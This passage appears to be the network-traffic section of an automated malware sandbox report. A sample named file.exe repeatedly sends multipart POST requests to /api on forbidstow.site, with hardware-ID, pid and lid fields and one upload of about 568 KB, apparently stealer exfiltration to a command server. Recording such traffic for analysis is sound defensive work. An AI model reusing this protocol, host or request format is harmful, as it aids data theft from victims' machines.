                                                                      2024-10-30 21:23:01 UTC1369INData Raw: 37 75 74 7a 47 75 38 32 57 4a 4c 42 55 34 76 32 70 4e 57 62 45 4c 2f 6e 46 76 31 57 46 41 64 6d 52 6f 64 4c 4d 44 67 48 32 30 69 39 72 31 41 70 31 52 34 57 67 34 5a 47 77 2f 32 76 68 38 35 56 74 75 55 59 39 6c 34 4c 43 6d 5a 4c 67 51 74 34 63 41 6a 45 42 4f 76 68 5a 52 4c 6a 50 56 69 54 77 46 61 48 2b 36 66 44 6d 68 4c 33 6f 31 2f 2f 51 6c 6c 63 4e 47 32 46 45 57 51 36 4c 73 67 49 34 76 39 68 41 61 49 69 47 49 57 49 57 49 2b 36 2b 34 65 53 48 72 33 6b 48 50 46 65 46 41 52 39 53 6f 38 44 63 33 41 53 77 67 4c 33 36 33 49 62 37 54 64 53 6c 4d 52 51 6a 2f 36 78 7a 4e 5a 62 39 2b 6f 48 75 41 4a 5a 4a 48 39 54 70 52 6c 73 4f 42 2b 4e 45 61 58 6f 65 31 71 36 66 56 2b 51 79 56 36 4a 2f 4b 6a 43 6d 78 57 79 35 78 6a 30 57 68 6b 48 63 6b 4f 4c 41 33 5a 30 44 4d 41
                                                                      Data Ascii: 7utzGu82WJLBU4v2pNWbEL/nFv1WFAdmRodLMDgH20i9r1Ap1R4Wg4ZGw/2vh85VtuUY9l4LCmZLgQt4cAjEBOvhZRLjPViTwFaH+6fDmhL3o1//QllcNG2FEWQ6LsgI4v9hAaIiGIWIWI+6+4eSHr3kHPFeFAR9So8Dc3ASwgL363Ib7TdSlMRQj/6xzNZb9+oHuAJZJH9TpRlsOB+NEaXoe1q6fV+QyV6J/KjCmxWy5xj0WhkHckOLA3Z0DMA
                                                                      2024-10-30 21:23:01 UTC1369INData Raw: 78 48 6b 4d 31 65 61 78 46 4c 44 74 4f 50 41 6a 6c 58 76 72 54 6a 69 56 78 38 54 5a 58 43 42 43 79 38 34 48 34 30 52 70 65 68 37 57 72 70 39 57 35 44 43 55 6f 62 2b 71 38 43 56 46 4c 76 70 45 76 56 65 45 41 42 78 56 35 51 4e 63 48 67 50 7a 51 66 70 2f 58 6b 66 34 6a 45 57 30 6f 68 59 6d 37 72 37 68 36 63 43 74 36 30 41 74 6b 4e 5a 41 33 67 46 33 6b 74 78 64 52 4c 50 42 2b 58 75 64 42 37 70 4f 6c 43 61 79 56 79 47 2b 61 62 42 6c 78 57 37 35 78 6a 77 55 42 63 4a 63 6b 47 41 44 54 34 32 51 4d 51 51 70 62 63 33 4b 4f 38 7a 58 35 2f 4f 55 70 58 53 6b 6f 65 4a 57 36 36 74 47 50 51 61 51 55 52 77 54 6f 34 48 65 33 41 46 77 67 44 76 35 33 67 56 38 44 78 5a 6c 63 39 55 6a 76 57 74 77 70 67 48 73 4f 59 55 38 46 4d 58 41 6a 51 4c 78 67 78 6d 4f 46 69 44 50 75 62 68
                                                                      Data Ascii: xHkM1eaxFLDtOPAjlXvrTjiVx8TZXCBCy84H40Rpeh7Wrp9W5DCUob+q8CVFLvpEvVeEABxV5QNcHgPzQfp/Xkf4jEW0ohYm7r7h6cCt60AtkNZA3gF3ktxdRLPB+XudB7pOlCayVyG+abBlxW75xjwUBcJckGADT42QMQQpbc3KO8zX5/OUpXSkoeJW66tGPQaQURwTo4He3AFwgDv53gV8DxZlc9UjvWtwpgHsOYU8FMXAjQLxgxmOFiDPubh
                                                                      2024-10-30 21:23:01 UTC1369INData Raw: 6c 59 6a 73 6c 51 77 37 54 6a 77 49 35 56 37 36 30 75 37 6c 30 65 43 7a 5a 73 67 52 42 2f 63 67 50 49 42 4b 58 77 4f 51 4f 69 4f 6c 72 63 6b 42 2b 4f 39 71 37 44 68 42 6d 33 37 52 62 2f 55 41 73 4c 65 30 69 46 43 33 74 71 41 64 45 48 37 75 70 30 48 75 30 79 57 70 54 43 48 38 32 36 70 4e 2f 57 54 66 66 42 48 4f 6c 51 57 79 4e 75 55 34 45 48 62 33 4d 4e 7a 30 6a 36 6f 57 35 61 35 54 45 57 78 49 68 66 67 76 65 78 77 70 63 66 76 65 41 58 39 31 38 63 43 33 42 42 6a 51 56 73 64 67 2f 44 44 75 37 75 63 68 6e 70 4e 31 69 56 32 68 2f 4e 75 71 54 66 31 6b 33 33 78 77 54 35 56 78 56 47 57 6b 36 51 44 44 78 5a 44 73 67 50 36 66 6b 33 42 61 77 6b 46 70 76 45 48 39 75 36 71 73 6d 61 46 72 44 6c 46 2f 31 61 45 67 52 37 54 34 67 4d 62 48 49 4d 79 52 72 71 37 48 6f 65 37
                                                                      Data Ascii: lYjslQw7TjwI5V760u7l0eCzZsgRB/cgPIBKXwOQOiOlrckB+O9q7DhBm37Rb/UAsLe0iFC3tqAdEH7up0Hu0yWpTCH826pN/WTffBHOlQWyNuU4EHb3MNz0j6oW5a5TEWxIhfgvexwpcfveAX918cC3BBjQVsdg/DDu7uchnpN1iV2h/NuqTf1k33xwT5VxVGWk6QDDxZDsgP6fk3BawkFpvEH9u6qsmaFrDlF/1aEgR7T4gMbHIMyRrq7Hoe7
                                                                      2024-10-30 21:23:01 UTC1369INData Raw: 49 57 49 2b 36 2b 34 65 57 45 62 76 75 47 50 5a 56 46 41 74 7a 54 6f 6b 42 63 47 6f 50 78 67 44 70 35 33 6f 49 36 44 64 45 6c 63 46 53 6a 66 4b 78 78 4e 5a 62 39 2b 6f 48 75 41 4a 5a 4e 6e 35 47 69 68 31 7a 64 30 44 63 52 76 79 76 63 42 61 69 5a 52 61 4f 32 6c 2b 49 2b 71 54 4a 68 42 53 2f 34 68 58 34 58 42 49 4f 64 30 79 43 42 58 64 2b 41 63 34 4a 35 4f 39 79 47 75 73 76 57 39 79 47 48 34 54 69 34 35 2f 57 49 72 76 6d 4c 76 74 4d 57 52 73 36 58 4d 59 4d 63 6a 68 59 67 77 6e 33 34 6e 38 65 34 6a 42 51 6c 38 6c 65 67 50 71 6a 78 4a 59 51 76 4f 49 5a 2f 31 63 54 44 58 31 58 6a 67 39 73 65 41 7a 48 53 4b 75 76 63 41 4b 69 5a 52 61 73 79 31 53 50 2b 71 37 53 31 67 72 35 39 46 2f 2f 56 6c 6c 63 4e 45 32 4e 41 48 68 7a 41 38 41 47 37 75 56 34 46 65 67 37 55 4a
                                                                      Data Ascii: IWI+6+4eWEbvuGPZVFAtzTokBcGoPxgDp53oI6DdElcFSjfKxxNZb9+oHuAJZNn5Gih1zd0DcRvyvcBaiZRaO2l+I+qTJhBS/4hX4XBIOd0yCBXd+Ac4J5O9yGusvW9yGH4Ti45/WIrvmLvtMWRs6XMYMcjhYgwn34n8e4jBQl8legPqjxJYQvOIZ/1cTDX1Xjg9seAzHSKuvcAKiZRasy1SP+q7S1gr59F//VllcNE2NAHhzA8AG7uV4Feg7UJ
                                                                      2024-10-30 21:23:01 UTC1369INData Raw: 38 61 2b 46 6c 78 69 6e 36 6c 2b 32 47 68 39 45 4c 42 58 49 53 33 70 70 51 4a 74 59 74 37 51 69 53 62 56 74 42 49 4f 47 52 73 50 73 34 35 2f 45 57 2f 66 2f 58 36 41 61 58 67 64 6d 56 34 41 49 61 48 74 48 2f 54 62 46 35 48 73 5a 37 6a 78 52 33 49 59 66 6a 4c 72 37 2f 74 59 57 70 66 39 51 36 55 77 55 46 48 4d 4a 6a 68 70 7a 64 45 43 4e 53 4b 6e 72 66 42 62 6e 4f 6b 62 54 32 6b 2b 49 39 72 57 4c 6b 67 66 33 6f 31 2f 70 55 52 59 57 65 6b 4c 4a 47 6d 68 31 45 4d 41 4e 34 71 4e 2f 43 2b 38 78 46 74 4b 49 53 6f 6a 32 70 63 71 44 57 71 62 37 48 4f 35 64 56 51 78 6c 53 49 70 4c 51 54 5a 41 32 30 69 39 72 30 49 5a 37 44 4e 52 69 74 6b 53 6f 2f 47 76 78 4a 6f 55 73 4b 31 52 75 46 78 5a 58 43 63 4c 78 67 39 76 4f 46 69 54 57 72 36 36 4a 45 32 79 62 30 6e 53 30 52 2b
                                                                      Data Ascii: 8a+Flxin6l+2Gh9ELBXIS3ppQJtYt7QiSbVtBIOGRsPs45/EW/f/X6AaXgdmV4AIaHtH/TbF5HsZ7jxR3IYfjLr7/tYWpf9Q6UwUFHMJjhpzdECNSKnrfBbnOkbT2k+I9rWLkgf3o1/pURYWekLJGmh1EMAN4qN/C+8xFtKISoj2pcqDWqb7HO5dVQxlSIpLQTZA20i9r0IZ7DNRitkSo/GvxJoUsK1RuFxZXCcLxg9vOFiTWr66JE2yb0nS0R+
                                                                      2024-10-30 21:23:01 UTC1369INData Raw: 38 56 62 39 2f 39 66 6f 42 70 65 43 6e 6c 45 68 51 56 39 61 68 4c 46 43 2f 50 73 4d 43 54 63 47 46 75 52 7a 56 47 45 78 4a 33 6d 6e 41 57 36 34 68 6a 47 5a 43 34 56 63 31 58 45 4c 58 31 75 41 34 4e 47 70 66 63 33 51 71 49 63 58 49 7a 46 55 49 53 36 37 59 65 53 56 65 2b 74 4f 76 56 58 48 41 70 7a 42 36 63 42 62 6e 55 50 78 45 69 72 72 33 74 61 75 6e 31 58 6c 74 68 53 6a 50 33 76 77 49 77 53 39 36 4e 66 39 68 70 42 52 48 56 50 6c 67 5a 78 66 30 7a 46 42 75 75 76 61 46 54 37 66 55 44 63 6b 41 7a 4e 75 72 47 48 7a 6c 58 77 34 78 4c 35 57 52 63 48 5a 6c 65 41 43 47 68 37 52 2f 30 32 77 4f 4a 36 48 2b 77 36 61 4b 4c 70 56 5a 50 33 72 4d 44 55 4e 62 44 37 48 4d 5a 6b 4c 68 56 7a 56 63 51 74 66 57 34 44 67 30 61 6c 39 7a 64 43 6f 68 78 63 6a 4d 56 51 68 4c 69 44
                                                                      Data Ascii: 8Vb9/9foBpeCnlEhQV9ahLFC/PsMCTcGFuRzVGExJ3mnAW64hjGZC4Vc1XELX1uA4NGpfc3QqIcXIzFUIS67YeSVe+tOvVXHApzB6cBbnUPxEirr3taun1XlthSjP3vwIwS96Nf9hpBRHVPlgZxf0zFBuuvaFT7fUDckAzNurGHzlXw4xL5WRcHZleACGh7R/02wOJ6H+w6aKLpVZP3rMDUNbD7HMZkLhVzVcQtfW4Dg0al9zdCohxcjMVQhLiD


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.549709104.21.41.394434088C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 21:23:02 UTC281OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 12833
                                                                      Host: forbidstow.site
                                                                      2024-10-30 21:23:02 UTC12833OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 43 35 43 42 38 37 45 44 39 37 41 44 41 31 42 42 43 39 41 45 37 38 39 35 36 33 44 30 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 4e 43 57 32 35 2d 2d 34 32 34 0d 0a
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E0C5CB87ED97ADA1BBC9AE789563D06B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"1NCW25--424
                                                                      2024-10-30 21:23:03 UTC1021INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 21:23:03 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=1mba00e157dmlfi3l6fb4klk2u; expires=Sun, 23-Feb-2025 15:09:41 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CA9W%2BNArEfUwXCi3utPtwhG%2FiE0xaHQVlaXy%2Br0iDF27ZDZNgL7O6DWayuegffVUDht32eEmuLtiDD%2F93LIMuzUOUfNhNXDCsa%2FFdPfBRBsotD76j%2BWDo2ohVmoFw%2B3vVoQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8dae76d45a043abf-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1192&sent=12&recv=18&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13772&delivery_rate=2320512&cwnd=251&unsent_bytes=0&cid=d2c640a2606270c9&ts=826&x=0"
                                                                      2024-10-30 21:23:03 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.78
                                                                      2024-10-30 21:23:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      3192.168.2.549713104.21.41.394434088C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 21:23:03 UTC281OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 15075
                                                                      Host: forbidstow.site
                                                                      2024-10-30 21:23:03 UTC15075OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 43 35 43 42 38 37 45 44 39 37 41 44 41 31 42 42 43 39 41 45 37 38 39 35 36 33 44 30 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 4e 43 57 32 35 2d 2d 34 32 34 0d 0a
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E0C5CB87ED97ADA1BBC9AE789563D06B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"1NCW25--424
                                                                      2024-10-30 21:23:04 UTC1014INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 21:23:04 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=n0itfc4n6k4pckp2a45fjho7cs; expires=Sun, 23-Feb-2025 15:09:43 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rG8kyC%2FlhX8rH0dN6aAqgGEEQo3ulA6EIkYXWekf1AbuY40zDLEjj361MbEKcOxbFpN9bxBkFLrCQiOgl%2F8AzZZuGvrfjBukIormuyLmzTJnkAOh%2Fno3F%2F1DckY8pDDYiNc%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8dae76ddbd63c872-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1054&sent=11&recv=20&lost=0&retrans=1&sent_bytes=4228&recv_bytes=16014&delivery_rate=623958&cwnd=253&unsent_bytes=0&cid=c944bc31b5a98512&ts=550&x=0"
                                                                      2024-10-30 21:23:04 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.78
                                                                      2024-10-30 21:23:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      4192.168.2.549714104.21.41.394434088C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 21:23:05 UTC281OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 20565
                                                                      Host: forbidstow.site
                                                                      2024-10-30 21:23:05 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 43 35 43 42 38 37 45 44 39 37 41 44 41 31 42 42 43 39 41 45 37 38 39 35 36 33 44 30 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 4e 43 57 32 35 2d 2d 34 32 34 0d 0a
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E0C5CB87ED97ADA1BBC9AE789563D06B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"1NCW25--424
                                                                      2024-10-30 21:23:05 UTC5234OUTData Raw: cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb
                                                                      Data Ascii: 6vMMZh'F3Wun 4F([:7s~X`nO
                                                                      2024-10-30 21:23:06 UTC1013INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 21:23:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=kr48dm0nghdcfrbnhbep7t8888; expires=Sun, 23-Feb-2025 15:09:44 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FVdG96QuoqPN7yPTqT5Ctc5e1Q8dqIn0C915TNNOG6bzgZsolFjXVLk4Q6qHMF8KUP%2Bhj5DrOJYofQCsk902b1BDEGFwXVFZPsHROQTs5vVE%2Fyk4og4lSIZ%2FexysW4yjjNs%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8dae76e68b0ce79e-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1911&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21526&delivery_rate=1565405&cwnd=252&unsent_bytes=0&cid=86ef51ac2a1f524b&ts=928&x=0"
                                                                      2024-10-30 21:23:06 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.78
                                                                      2024-10-30 21:23:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      5192.168.2.549715104.21.41.394434088C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 21:23:07 UTC280OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 1272
                                                                      Host: forbidstow.site
                                                                      2024-10-30 21:23:07 UTC1272OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 43 35 43 42 38 37 45 44 39 37 41 44 41 31 42 42 43 39 41 45 37 38 39 35 36 33 44 30 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 4e 43 57 32 35 2d 2d 34 32 34 0d 0a
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E0C5CB87ED97ADA1BBC9AE789563D06B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"1NCW25--424
                                                                      2024-10-30 21:23:07 UTC1006INHTTP/1.1 200 OK
                                                                      Date: Wed, 30 Oct 2024 21:23:07 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=0akmml67ihv38bek79fg7tq08a; expires=Sun, 23-Feb-2025 15:09:46 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cpKgYlJR7xKXA4XMTs0uapOcC8VrrrV0WflbS9h3JtrKMuTWqQODLfuJdY%2Bh1QfWNx2hNEcwHITr6sA71A7OnXXbP2qlKUnwBRraF4rH7Bdec5tdPLPEu8acLa3NOgqyL5E%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8dae76f178c428b3-DFW
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1400&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2188&delivery_rate=2055358&cwnd=229&unsent_bytes=0&cid=a69f7ae920c0140d&ts=487&x=0"
                                                                      2024-10-30 21:23:07 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 38 0d 0a
                                                                      Data Ascii: 11ok 173.254.250.78
                                                                      2024-10-30 21:23:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      6192.168.2.549716104.21.41.394434088C:\Users\user\Desktop\file.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-10-30 21:23:08 UTC282OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 568525
                                                                      Host: forbidstow.site
                                                                      2024-10-30 21:23:08 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 30 43 35 43 42 38 37 45 44 39 37 41 44 41 31 42 42 43 39 41 45 37 38 39 35 36 33 44 30 36 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 31 4e 43 57 32 35 2d 2d 34 32 34 0d 0a
                                                                      Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"E0C5CB87ED97ADA1BBC9AE789563D06B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"1NCW25--424
